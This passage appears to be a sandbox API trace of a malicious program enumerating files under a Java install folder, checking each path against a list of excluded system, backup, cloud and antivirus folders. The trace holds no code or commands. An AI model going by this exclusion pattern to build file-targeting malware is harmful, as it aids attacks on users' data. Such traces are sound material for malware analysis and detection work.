CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0091.075] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.075] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0091.076] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.076] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.095] CharUpperBuffW (in: lpsz="LucidaBrightDemiBold.ttf", cchLength=0x18 | out: lpsz="LUCIDABRIGHTDEMIBOLD.TTF") returned 0x18 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.095] CharUpperBuffW (in: lpsz="LucidaBrightDemiItalic.ttf", cchLength=0x1a | out: lpsz="LUCIDABRIGHTDEMIITALIC.TTF") returned 0x1a [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.095] CharUpperBuffW (in: lpsz="LucidaBrightItalic.ttf", cchLength=0x16 | out: lpsz="LUCIDABRIGHTITALIC.TTF") returned 0x16 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.095] CharUpperBuffW (in: lpsz="LucidaBrightRegular.ttf", cchLength=0x17 | out: lpsz="LUCIDABRIGHTREGULAR.TTF") returned 0x17 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.095] CharUpperBuffW (in: lpsz="LucidaSansDemiBold.ttf", cchLength=0x16 | out: lpsz="LUCIDASANSDEMIBOLD.TTF") returned 0x16 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.095] CharUpperBuffW (in: lpsz="LucidaSansRegular.ttf", cchLength=0x15 | out: lpsz="LUCIDASANSREGULAR.TTF") returned 0x15 [0091.095] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.095] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.096] CharUpperBuffW (in: lpsz="LucidaTypewriterBold.ttf", cchLength=0x18 | out: lpsz="LUCIDATYPEWRITERBOLD.TTF") returned 0x18 [0091.096] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.096] CharUpperBuffW (in: lpsz=".ttf", cchLength=0x4 | out: lpsz=".TTF") returned 0x4 [0091.096] CharUpperBuffW (in: lpsz="LucidaTypewriterRegular.ttf", cchLength=0x1b | out: lpsz="LUCIDATYPEWRITERREGULAR.TTF") returned 0x1b [0091.096] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.096] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.096] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.096] CharUpperBuffW (in: lpsz=".properties", cchLength=0xb | out: lpsz=".PROPERTIES") returned 0xb [0091.096] CharUpperBuffW (in: lpsz="hijrah-config-umalqura.properties", cchLength=0x21 | out: lpsz="HIJRAH-CONFIG-UMALQURA.PROPERTIES") returned 0x21 [0091.096] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.097] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.097] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0091.097] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0091.098] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.098] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0091.099] CharUpperBuffW (in: 